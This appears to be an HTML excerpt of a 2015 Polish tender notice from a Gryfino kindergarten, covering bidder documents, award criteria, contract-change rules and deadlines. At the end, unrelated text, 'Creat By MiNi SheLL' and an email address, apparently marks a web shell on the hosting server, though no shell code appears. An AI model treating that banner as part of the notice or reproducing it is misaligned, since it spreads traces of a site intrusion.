</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zobowiązanie do oddania do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Szybkość dostarczenia brakującej ilości towaru oraz towaru wolnego od wad - 3</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W przypadku zmiany stawki podatku VAT w trakcie obowiązywania umowy dopuszcza się zmianę wartości umowy o różnicę wynikającą ze zmiany wartości podatku VAT. Taka zmiana może nastąpić po zaakceptowaniu przez Zmawiającego pisemnego wniosku Wykonawcy zawierającego uzasadnienie faktyczne i prawne.
2. W przypadku zmian:
1)stawki podatku od towarów i usług,
2)wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust.   3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę 
3)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub    wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne; 
jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę, nastąpi waloryzacja wynagrodzenia należnego Wykonawcy. 
3.	Zasady wprowadzania zmian wysokości stawek wyglądać będą następująco:
1)	wynagrodzenie Wykonawcy, o którym mowa w § 3 ust. 1 będzie waloryzowane 
w trakcie obowiązywania umowy w przypadku zmiany stawki podatku od towarów 
i usług. W takim przypadku wartość wynagrodzenia netto Wykonawcy nie zmieni się, a wartość wynagrodzenia zostanie wyliczona z uwzględnieniem stawki podatku od towarów i usług wynikającej ze zmienionych przepisów i określona w aneksie do umowy
2)	stawki na rok 2016 będą waloryzowane raz w roku w miesiącu styczniu 
o średnioroczny wskaźnik wzrostu cen towarów i usług ogłoszony przez Prezesa Głównego Urzędu Statystycznego. 
3)	w przypadku deflacji (wskaźnika ujemnego) stawki będą obniżone.
4)	stawki w  2016 mogą  ulec wzrostowi o stopień (procent) wzrostu minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę, ogłaszanego każdego roku w Dzienniku Urzędowym Rzeczypospolitej Polskiej Monitor Polski w drodze obwieszczenia Prezesa Rady Ministrów, jeśli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
5)	stawki w 2016 mogą ulec wzrostowi w przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeśli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.
6)	w przypadkach opisanych w pkt 1)-5)  Wykonawca zobowiązany jest do wykazania odpowiednimi dokumentami, że zmiany te miały wpływ na koszty wykonania zamówienia przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uszatkaprzedszkole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka w Gryfinie, ul. Krzywoustego 5, 74-100 Gryfino (Biuro Dyrektora).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2015 godzina 09:00, miejsce: Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka, ul. Krzywoustego 5, 74-100 Gryfino, Biuro Dyrektora..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com